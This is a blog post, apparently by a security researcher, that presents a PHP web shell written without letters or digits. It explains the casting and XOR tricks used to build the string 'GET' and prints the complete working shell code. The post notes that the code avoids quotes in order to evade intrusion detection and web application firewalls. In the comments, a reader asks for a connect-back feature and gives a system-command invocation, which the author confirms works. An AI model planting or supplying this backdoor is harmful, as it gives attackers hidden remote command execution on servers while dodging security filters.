Anti Alphanum PHP Shell
After my release about the Tiny PHP Shell, Mr. Gareth Hayes @ The Spanner made a non-alphanumeric variant.
I got inspired by his nifty script and started researching further.
My main plan was to create an array of data with different values in order to have something to work with. So my first shot was this:
@$_[]=@!+_;
PHP will try to parse the green underscore as a constant, when the interpreter is unable to find the constant it will prompt you with a notice. I surpress the notice warning using the '@'.
The "lost-constant" in turn will be converted to a string (string(1) "_").
Just like Gareth Hayes, I used the plus-operator (red) to cast the string to an integer (int(0)).
By appending the exclamation-mark (blue), the value 0 will be casted to a boolean (bool(true)).
So far so good! We have a boolean saying true!
I try to store it by pushing the value into the array $_ (yellow). However it doesn't exist.
By suppressing that too, PHP will automagically create it for you, and your value will get stored.
That's how I initialize my array. So, what do we do know?
Well, just like Mr. Gareth stated, if you try to access an array as a string in PHP.
It will generate the string "Array".
If we have a string, we can generate other strings out of it by (ab)using AND, OR and XOR.
I figured, I had quite a few characters I easily could generate in PHP.
So I coded this fuzzer in VB.NET which permutated through AND, OR and XOR and gave me all the combinations that matched any letter in the words GET, POST and REQUEST. (Now when I'm thinking about it later on, I could have added COOKIE too...)
Never the less, my fuzzer (phpfuzz.vb) gave me the following results: fuzz_result.txt.
By analyzing the results, you'll notice we're able to generate all of those three methods by using only a 15 character list.
But for the sake of clarity, I choosed to go with GET.
By utilizing some boolean magic and variable dereferencing I ended up with this:
<?
@$_[]=@!+_;$__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++))].=$_;
$_[]=++$__;$_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+$_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__]=($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__]);
$_[$__+$__].=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__]);
$_[$__+$__].=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__];
$_=$ //Fredrik N. Almroth - h.ackack.net
$_[$__+$__];$_[@-_]($_[@!+_]);
?>
...if WordPress tampered with the bytes, you may download it here.
The method for execution used in the Tiny PHP Shell and Gareth's shell remains the same.
But if you look at it, I added a few sneak factors.
- No quotes! Quotes tend to trigger IDS'es and WAF's.
- No use of functions.
- No strings.
- No numbers.
- No constants.
If you're going to the Chaos Communication Congress - 28C3 (2011), then see you there!
Ciao.
6 Comments
-
nobody says:
So works on unix servers too ? And how can you implement some more features for it. I'll await a reply here.
-
Fredrik Nordberg Almroth says:
Yes, it should be cross-OS compatible for as far as I know
Well, what kind of features do you want me to add? I'll see what I can do never the less. -
-
nobody says:
A simple conn-back script inside it or I don't know something usefull so I don't have to do everything
and if it works what's the cmdchar for a cmd ?0=system&1=uname%20-a
something like that ? -
Fredrik Nordberg Almroth says:
Nobody: I'll see what I can do.
Yes, that's supposed to work as long as the system()-function isn't disabled. -
Fredrik Nordberg Almroth says:
Nobody: I'm unable to make a cross-OS conn-back script. I have no idea on how to properly hook cmd.exe on Windows. Sadly.
Hey, I'm Fredrik. I'm from Sweden, born 1990, and I got a huge interest for information technology and information security. So far, I've been studying for three years at the Internation IT College of Sweden and one year at the Royal Institute of Technology (Kista, Sweden). I'm currently working at Young / Skilled and as a shareholder of Arctic Security. If you wish to contact me, please email me at h@ackack.net or follow me at twitter @Almroot.